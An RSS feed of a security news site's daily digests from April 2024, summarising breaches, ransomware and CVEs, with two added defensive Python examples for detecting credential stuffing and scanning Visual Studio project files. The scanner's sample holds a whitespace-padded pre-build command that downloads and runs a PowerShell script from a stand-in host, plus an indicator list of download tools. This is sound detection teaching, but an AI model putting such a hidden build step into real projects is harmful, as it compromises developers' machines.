https://techkranti.com/16-apr-24-in-security-news-today/feed/ 0 714
15-Apr-24: In Security News Today https://techkranti.com/15-apr-24-in-security-news-today/ https://techkranti.com/15-apr-24-in-security-news-today/#respond Mon, 15 Apr 2024 19:33:33 +0000 https://techkranti.com/?p=712 Hacker dumps data of 2.8 million Giant Tiger customers

A threat actor claimed responsibility for a March 2024 data breach at Giant Tiger, exposing 2.8 million customer records including email addresses, names, addresses, and phone numbers. The hacker dumped the stolen data on a forum, offering it for free with a download link requiring ‘8 credits’ to unlock. Giant Tiger confirmed the breach was due to a cybersecurity incident with a third-party vendor, urging customers to be cautious of messages regarding payment information.

Roku cyberattack impacts 576,000 accounts

Roku reported that 576,000 user accounts were affected by a second credential-stuffing attack, discovered while investigating an earlier incident involving 15,000 accounts. In both cases the attackers used username and password pairs stolen from unrelated breaches, which works against any account whose owner reused the password; in fewer than 400 cases the attackers logged in and made unauthorized purchases with stored payment methods. Roku has reset passwords for the affected accounts, enabled two-factor authentication for all accounts, and is notifying affected users and reversing the unauthorized charges.
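Credential stuffing looks different from brute force in the logs: one source touches many distinct accounts, usually once each, with a low success rate, because every pair it tries was already valid somewhere else. As an added example, not Roku's code, the Python below runs that check over constructed JSON login events, flags the stuffing source and lists the accounts that were successfully logged into from it, which are the ones to force-reset first. The events, addresses, account names and thresholds are all invented for the example.

```python
import json
from collections import defaultdict

# Constructed login events (JSON lines) from a hypothetical web login endpoint;
# addresses, account names and timestamps are invented for this example.
SAMPLE_EVENTS = """\
{"ts": "2024-04-12T03:00:01Z", "ip": "203.0.113.50", "account": "alice@example.com", "result": "fail"}
{"ts": "2024-04-12T03:00:02Z", "ip": "203.0.113.50", "account": "bob@example.com", "result": "fail"}
{"ts": "2024-04-12T03:00:03Z", "ip": "203.0.113.50", "account": "carol@example.com", "result": "success"}
{"ts": "2024-04-12T03:00:04Z", "ip": "203.0.113.50", "account": "dave@example.com", "result": "fail"}
{"ts": "2024-04-12T03:00:05Z", "ip": "203.0.113.50", "account": "erin@example.com", "result": "fail"}
{"ts": "2024-04-12T03:00:06Z", "ip": "203.0.113.50", "account": "frank@example.com", "result": "fail"}
{"ts": "2024-04-12T03:00:07Z", "ip": "203.0.113.50", "account": "grace@example.com", "result": "success"}
{"ts": "2024-04-12T03:00:08Z", "ip": "203.0.113.50", "account": "heidi@example.com", "result": "fail"}
{"ts": "2024-04-12T03:00:09Z", "ip": "203.0.113.50", "account": "ivan@example.com", "result": "fail"}
{"ts": "2024-04-12T03:00:10Z", "ip": "203.0.113.50", "account": "judy@example.com", "result": "fail"}
{"ts": "2024-04-12T09:15:00Z", "ip": "198.51.100.8", "account": "alice@example.com", "result": "fail"}
{"ts": "2024-04-12T09:15:20Z", "ip": "198.51.100.8", "account": "alice@example.com", "result": "fail"}
{"ts": "2024-04-12T09:15:45Z", "ip": "198.51.100.8", "account": "alice@example.com", "result": "success"}
"""

MIN_DISTINCT_ACCOUNTS = 8       # fan-out a single legitimate client never produces
MAX_ATTEMPTS_PER_ACCOUNT = 1.5  # stuffing tries each leaked pair once or twice
MAX_SUCCESS_RATE = 0.5          # real users succeed far more often than this


def load_events(text):
    """Parse one JSON object per line; blank lines are ignored."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def detect_credential_stuffing(events):
    """Return stuffing sources and the accounts they got into."""
    per_ip = defaultdict(lambda: {"attempts": 0, "successes": 0,
                                  "accounts": set(), "hits": set()})
    for ev in events:
        s = per_ip[ev["ip"]]
        s["attempts"] += 1
        s["accounts"].add(ev["account"])
        if ev["result"] == "success":
            s["successes"] += 1
            s["hits"].add(ev["account"])

    sources, compromised = [], set()
    for ip, s in sorted(per_ip.items()):
        n = len(s["accounts"])
        if n < MIN_DISTINCT_ACCOUNTS:
            continue          # one user fat-fingering a password
        if s["attempts"] / n > MAX_ATTEMPTS_PER_ACCOUNT:
            continue          # repeated guesses per account is brute force, a different rule
        if s["successes"] / s["attempts"] > MAX_SUCCESS_RATE:
            continue          # e.g. an office NAT with many real users behind it
        sources.append({"ip": ip, "accounts": n, "attempts": s["attempts"],
                        "successes": s["successes"]})
        compromised |= s["hits"]   # successful logins from a stuffing source
    return {"stuffing_sources": sources,
            "compromised_accounts": sorted(compromised)}


if __name__ == "__main__":
    print(detect_credential_stuffing(load_events(SAMPLE_EVENTS)))
```

The three filters matter as much as the count: a single user retrying a password, a brute-force run against one account, and a busy office NAT all generate volume but fail one of the ratio checks, while the stuffing source passes all three. The compromised_accounts list is what the response in the item above acts on: session revocation, password reset and step-up to 2FA.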

Former Security Engineer Sentenced to Prison for Hacking Crypto Exchanges

Shakeeb Ahmed, a former security engineer, has been sentenced to three years in prison for exploiting vulnerabilities in smart contracts of two cryptocurrency exchanges, defrauding them of substantial sums. By manipulating price data and smart contract terms, Ahmed illegally withdrew millions, returning some funds in exchange for a “bounty” while keeping the rest. His sentence also includes three years of supervised release and restitution payments totaling over $5 million to the affected exchanges.

Airlines Apps Might Know More Than You Think

Recent investigations into popular airline apps reveal they may access more personal data than expected, raising privacy and cybersecurity concerns. Cybernews highlighted that these apps often require permissions that could compromise user data security, not always clearly disclosed. Furthermore, incidents like AirAsia’s alleged ransomware attacks underline the vulnerability of airline systems and the urgent need for stringent data protection measures.

Chipmaker Nexperia Confirms Breach After Ransomware Gang Leaks Data

Dutch chipmaker Nexperia confirmed a data breach after a ransomware gang leaked samples of allegedly stolen data. The breach occurred in March 2024, with the threat actors claiming to have stolen 1 TB of confidential data. The extortion site ‘Dunghill Leak’ linked to the Dark Angels ransomware gang is pressuring Nexperia to pay a ransom to prevent the leak of sensitive information, including data from high-profile clients like SpaceX, IBM, Apple, and Huawei.

Daixin Ransomware Gang Claims Attack on Omni Hotels

The Daixin Team ransomware gang has claimed responsibility for a cyberattack on Omni Hotels & Resorts, threatening to publish customers’ sensitive information if a ransom is not paid. The attack led to a nationwide IT outage impacting reservation, hotel room door lock, and point-of-sale systems. Daixin Team is known for targeting organizations through VPN server vulnerabilities or compromised credentials, using stolen data for double extortion.

Pro-Iranian Cyber Gang Claims to Have Breached Radar Systems and Sent 500,000 Text messages to Israeli Citizens

Pro-Iranian cyber groups have escalated their cyberattacks in tandem with Iran’s missile strikes against Israel, claiming to have compromised Israeli radar systems and sent threatening text messages to citizens. Despite posting proof, inconsistencies in the hackers’ claims cast doubt on the actual impact of these cyberattacks. The intensifying cyber operations target both governmental and private sectors, indicating a broader strategy to supplement physical military actions.

Chinese-Linked LightSpy iOS Spyware Targets South Asian iPhone Users

Cybersecurity researchers have identified a renewed cyber espionage campaign targeting South Asian users with LightSpy, an Apple iOS spyware implant. The current version, which the researchers call F_Warehouse, is modular and capable of extensive data exfiltration, audio surveillance, and potentially full device control. The implant pins the certificate of its command-and-control server, which blocks TLS interception of its traffic and so hinders analysis rather than evading detection on the device, and the server's admin panel shows error messages in Chinese. The campaign is attributed to the Chinese nation-state group APT41.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

]]>
https://techkranti.com/15-apr-24-in-security-news-today/feed/ 0 712
10-Apr-24: In Security News Today https://techkranti.com/10-apr-24-in-security-news-today/ https://techkranti.com/10-apr-24-in-security-news-today/#respond Thu, 11 Apr 2024 01:46:50 +0000 https://techkranti.com/?p=709 AT&T Now Says Data Breach Impacted 51 Million Customers

AT&T is notifying 51 million former and current customers about a data breach that exposed their personal information on a hacking forum, with details including names, addresses, phone numbers, social security numbers, and more. The breach, initially denied by AT&T, was confirmed after data was leaked by threat actors. AT&T is now facing class-action lawsuits for the security lapse and delay in informing affected customers, urging recipients to monitor their accounts and enroll in identity theft protection services.

Attack on Consumer Electronics Manufacturer boAt Leaks Data on 7.5M Customers

A hacker leaked the personal data of 7.5 million boAt customers, including comprehensive personal information, by posting it on the Dark Web for a mere $2, raising questions about the data’s authenticity. Investigations confirmed the accuracy of the leaked data, spotlighting the vulnerability of boAt, India’s leading consumer electronics brand. Experts emphasize the importance of data encryption and anti-exfiltration tools to prevent such breaches, suggesting boAt’s security measures were insufficient.

Underground Online Casino Fixbet Exposes 850K Users

The underground online casino Fixbet, targeting the Turkish market, suffered a data breach exposing personal information of 850,000 users. This breach is particularly sensitive due to the illegal status of gambling in Turkey, placing users at risk of cyberstalking, financial loss, and legal repercussions. The leak was attributed to human error, revealing usernames, passwords, and extensive personal details, underscoring the critical need for stringent data security measures in online gambling platforms.

Accor Hospitality Database Leaked, Exposing 642K Individuals

A database linked to hospitality giant Accor was leaked, compromising the personal information of 642,000 individuals. The leak includes names, emails, job titles, and employer details, raising risks of targeted phishing and scams. The breach underscores the need for stringent data security and vigilance against social engineering attacks.

LG TV Vulnerabilities Expose 91,000 Devices

Bitdefender discovered four vulnerabilities in LG TVs running webOS versions 4 through 7, affecting models including LG43UM7000PLA and OLED55CXPUA and together allowing an attacker on the network to gain root on the TV. CVE-2023-6317 bypasses the PIN check in the second-screen service to add an authorized user, CVE-2023-6318 escalates that access to root, CVE-2023-6319 is an OS command injection, and CVE-2023-6320 is an authenticated command injection. The service is meant for the local network, but around 91,000 devices expose it to the internet. Bitdefender notified LG on November 1, 2023, and the patch was released on March 22, 2024; owners should apply the webOS update and keep the TV off any internet-reachable interface.

French Football Giant PSG Says Attackers Targeted its Ticketing System


Ransomware Attack Cripples German Business Intelligence Provider GBI Genios

A ransomware attack on GBI Genios, a key German business intelligence and database provider, has severely disrupted access to crucial press publications and business information, with expectations of several days for service restoration. This incident affects a wide range of institutions, including media, universities, and libraries, highlighting the vulnerability of critical information infrastructure to cyber threats. The attack underlines the importance of robust cybersecurity measures for data providers.

Half of UK Businesses Hit by Cyber-Incident in Past Year, UK Government Finds

The UK Government’s Cyber Security Breaches Survey 2024 reveals that half of UK businesses and a third of charities experienced cyber incidents in the past year, with phishing being the primary cause. While most organizations were able to restore operations within 24 hours, large businesses faced more negative outcomes. The survey also highlights a lack of focus on risk management, incident response plans, and supply chain security, emphasizing the need for improved cybersecurity measures and awareness.

GitHub’s Fake Popularity Scam Tricking Developers into Downloading Malware

Threat actors are gaming GitHub search to push developers toward malicious repositories: they create repositories with popular names and topics, refresh them with frequent automated commits so they rank highly when results are sorted by most recently updated, and add fake stars from throwaway accounts to make them look trusted. The malicious code is concealed in Microsoft Visual Studio project files (.vcxproj), in a pre-build event padded with whitespace so it sits off-screen in the editor, and runs as soon as the project is built. Stars and recent activity are therefore not a trust metric on their own; inspect build scripts and project files before building code pulled from an unfamiliar repository.
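The check a practitioner wants here is a pre-build review of the project files themselves. As an added example, not code from the research or from this site, the Python below parses a constructed .vcxproj, pulls every command MSBuild would execute (pre-build, pre-link, post-build and custom build events, plus Exec tasks inside targets) and flags commands that download, launch PowerShell with a hidden window or bypassed execution policy, carry an encoded command, or hide behind long runs of whitespace. The project content, URL and paths are invented; the indicator list is illustrative, not exhaustive.

```python
import re
import xml.etree.ElementTree as ET

MSBUILD_NS = "http://schemas.microsoft.com/developer/msbuild/2003"

# Constructed .vcxproj with a padded pre-build event that fetches and runs a
# script. The URL, paths and project content are invented for this example.
SAMPLE_VCXPROJ = """\
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup>
    <ClCompile Include="main.cpp" />
  </ItemGroup>
  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
    <ClCompile>
      <Optimization>MaxSpeed</Optimization>
    </ClCompile>
    <PreBuildEvent>
      <Command>echo Building...{PAD}powershell -w hidden -ep bypass -c "iwr http://example.invalid/p.ps1 -o $env:TEMP\\p.ps1; &amp; $env:TEMP\\p.ps1"</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
  <Target Name="Notify" AfterTargets="Build">
    <Exec Command="echo build finished" />
  </Target>
</Project>
""".replace("{PAD}", " " * 80)   # whitespace padding pushes the payload off-screen in the IDE

# Indicators that a build command is doing more than compiling.
SUSPICIOUS = [
    ("powershell", re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)),
    ("exec-policy-bypass", re.compile(r"-(ep|executionpolicy)\s+bypass", re.I)),
    ("encoded-command", re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden-window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("download", re.compile(r"\b(iwr|invoke-webrequest|curl|wget|certutil|bitsadmin|mshta)\b", re.I)),
    ("url", re.compile(r"https?://", re.I)),
    ("padding", re.compile(r"[ \t]{40,}")),
]


def iter_commands(root):
    """Yield (location, command) for every shell command MSBuild would run."""
    ns = f"{{{MSBUILD_NS}}}"
    for tag in ("PreBuildEvent", "PreLinkEvent", "PostBuildEvent", "CustomBuildStep"):
        for event in root.iter(ns + tag):
            cmd = event.find(ns + "Command")
            if cmd is not None and cmd.text:
                yield tag, cmd.text
    for target in root.iter(ns + "Target"):
        for ex in target.iter(ns + "Exec"):
            if ex.get("Command"):
                yield f"Target[{target.get('Name')}]/Exec", ex.get("Command")


def scan_project(xml_text):
    """Return one finding per build command that matches any indicator."""
    findings = []
    for location, command in iter_commands(ET.fromstring(xml_text)):
        hits = [name for name, rx in SUSPICIOUS if rx.search(command)]
        if hits:
            findings.append({
                "location": location,
                "indicators": hits,
                # collapse the padding so the command is readable in a report
                "command": " ".join(command.split())[:160],
            })
    return findings


if __name__ == "__main__":
    for f in scan_project(SAMPLE_VCXPROJ):
        print(f["location"], f["indicators"])
        print("  ", f["command"])
```

Run it over every .vcxproj, .csproj and .targets file in a freshly cloned repository before opening the solution; the benign Exec task in the sample produces no finding, while the padded pre-build event trips six indicators. Any hit is a reason to read the command in full, since build events run with the developer's privileges the moment the project is built.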

‘eXotic Visit’ Spyware Campaign Targets Android Users in India and Pakistan

The eXotic Visit spyware campaign is actively targeting Android users in India and Pakistan, distributing malware through dedicated websites and the Google Play Store. The campaign, ongoing since November 2021, is highly targeted and involves fake-but-functional apps masquerading as messaging services and other legitimate services. The malware, XploitSPY RAT, is capable of gathering sensitive data from infected devices and employs various tactics to evade detection, with the main purpose being espionage in South Asia.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

]]>
https://techkranti.com/10-apr-24-in-security-news-today/feed/ 0 709
09-Apr-24: In Security News Today https://techkranti.com/09-apr-24-in-security-news-today/ https://techkranti.com/09-apr-24-in-security-news-today/#respond Tue, 09 Apr 2024 18:55:17 +0000 https://techkranti.com/?p=706 Banking Giant Wells Fargo Suffers Data Breach

Wells Fargo experienced a data breach affecting customer names and mortgage account numbers, with unclear details on the breach’s timing or duration. The bank responded promptly, taking undisclosed actions against an implicated employee and enhancing monitoring and security measures to prevent future incidents. This event adds to the growing list of cybersecurity issues facing major US banks.

Ransomware Gang Stole the Health Data of 533,000 People

A ransomware gang breached the network of Group Health Cooperative of South Central Wisconsin (GHC-SCW) in January, stealing personal and medical information of over 500,000 individuals. The attackers were unable to encrypt the compromised devices, allowing GHC-SCW to secure its systems with the help of cyber incident response experts. The BlackSuit ransomware gang claimed responsibility for the attack, which included stolen health data, financial information, and business contracts.

DOJ-Collected Information Exposed in Data Breach Affecting 340,000

Greylock McKinnon Associates, Inc. reported a breach compromising personal and Medicare information of over 340,000 individuals, originally collected for the US Department of Justice for a civil litigation matter. The breach, detected in May 2023, took months to assess, leading to the offer of credit monitoring services for affected individuals. This incident underscores the significant impact of data breaches on privacy and the lengthy process of incident response and notification.

Change Healthcare Hit By Cyber Extortion Again

Change Healthcare, a UnitedHealth Group subsidiary, faces renewed extortion roughly a month after a ransom was reportedly paid following the February 2024 ransomware attack by the ALPHV/BlackCat gang. The new RansomHub group, which may include former BlackCat affiliates, is threatening to publish the stolen data unless a further ransom is paid. The episode is a reminder that paying does not guarantee decryption or restored access, and, as here, does not guarantee that stolen data is deleted or that only one party holds a copy.

Cyberattack Disrupts Targus Business Operations

Targus, a maker of laptop bags and mobile accessories, experienced a cyberattack that disrupted operations after unauthorized access to its file systems was detected on April 5, 2024. The company, backed by B. Riley Financial, responded with immediate containment and recovery efforts and said the incident should not materially affect its financial outlook. Specifics of the breach, including who was behind it, remain unclear.

Canadian Online Vehicle Dealer EBlock Hit By Cyberattack

EBlock, a Canadian online vehicle auction company, experienced a cyberattack affecting its ABS Auto Auctions infrastructure, compromising personal data including social security numbers and bank details. The company responded by securing the compromised systems and launching an investigation, while also offering affected customers a year of free identity monitoring services. This incident highlights the vulnerability of digital platforms to unauthorized access and the importance of robust cybersecurity measures.

Over 90,000 LG Smart TVs May Be Exposed to Remote Attacks

Bitdefender researchers discovered four vulnerabilities in LG Smart TVs running WebOS, allowing unauthorized access and control, including authorization bypasses and command injections. Over 90,000 exposed devices were found vulnerable to these flaws. LG released security updates in March 2024, urging users to apply them to prevent potential remote attacks and protect against exploitation for malicious activities like DDoS attacks or cryptomining.

92,000 D-Link NAS Devices Open to Critical Command-Injection Bug

A critical flaw, tracked as CVE-2024-3273, in end-of-life D-Link NAS models (DNS-320L, DNS-325, DNS-327L and DNS-340L) lets attackers take over the devices and read the data on them. It combines a hardcoded backdoor account with no password and a command injection in the nas_sharing.cgi script, giving unauthenticated remote code execution; more than 92,000 affected devices are reachable from the internet. No patch will be issued, so D-Link advises retiring and replacing the devices; until then, take them off the internet and block inbound access to their web interface.

Microsoft April 2024 Patch Tuesday Fixes 150 Security Flaws, 67 RCEs

Microsoft's April 2024 Patch Tuesday addressed 150 security flaws, including 67 remote code execution vulnerabilities, a large share of them in Microsoft SQL (ODBC and OLE DB) drivers. Microsoft initially listed no zero-days, although two of the fixed bugs were later marked as exploited in the wild. Separately, Varonis researchers disclosed two SharePoint issues that let file exfiltration slip past audit logging; those have no CVEs assigned and remain unpatched.

Parental Control App KidSecurity Exposes Live GPS Locations of Kids on the Internet

The parental control app KidSecurity suffered a significant data breach, exposing children’s GPS locations and private messages due to improperly secured data streams. Over a million users’ sensitive information, including social media interactions and device details, was accessible online for over a year. This marks the second security failure for KidSecurity, raising serious concerns about the app’s data protection practices.

Disclaimer: Titles and summaries are AI-generated. Please refer to the linked content for more details.

]]>
https://techkranti.com/09-apr-24-in-security-news-today/feed/ 0 706